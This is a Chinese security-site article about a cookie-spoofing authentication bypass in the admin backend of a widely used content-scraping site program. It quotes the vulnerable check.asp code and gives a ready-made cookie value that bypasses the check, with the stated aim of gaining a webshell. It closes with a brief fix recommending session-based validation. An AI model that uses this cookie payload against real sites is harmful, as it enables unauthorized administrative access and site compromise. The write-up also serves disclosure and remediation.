频道栏目
首页 > 安全 > 网站安全 > 正文

站长内容联盟后台Cookie欺骗漏洞利用及修复

2011-04-18 11:17:59           
收藏   我要投稿

站长内容联盟是国内使用最广泛的一套小偷程序,但是其后台验证不严格,通过cookie欺骗,可以绕过验证直接进入后台,拿到webshell。网站内容联盟,想必大多数站长都是知道的,或许都加入过一个或多个联盟。或许有些新人不了解,这里还是简单介绍一下网站内容联盟的特点:

1、免费拥有独立频道,联盟主办方负责更新和维护,加盟站长坐享其成;

2、联盟网站一般都默认统一的模版,但站长可以设置网站头和尾;

3、站长拥有自己的广告位,可以自己设置,有的还有推广佣金提成;

4、加盟网站和主办方网站访问量互相促进,大大提高网站排名。

 

漏洞利用:

验证文件 check.asp中的漏洞代码如下:


dim CheckAdmin,CheckAdminAll,Administer,tempAdmin,tadmin,Flag,Purview,AdminName

if md5(request.cookies("rand")&request.cookies("AdminName")&request.cookies("adminid"))<>request.cookies("check") then

errmsg=errmsg+ "<BR>"+"<li>没有权限或登录超时,请按确定返回重新登录."

call Error_Msg(Errmsg)

response.end

end if

cookie欺骗的漏洞很明显,只要rand+AdminName+adminid的md5密文与check匹配即可。

 


改cookie为check=802e5e662c4ebe86c497b15afe0b58fd; rand=1; AdminName=admin


修复:

这样的系统建议用session验证,或者cookie验证时加上从数据库中读取的password。

作者: yeweit6,由情整理编辑

上一篇:W78企业网站后台管理系统ewebeditor5.5漏洞利用及修复
下一篇:SoftXMLCMS Shell 上传缺陷及修复
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站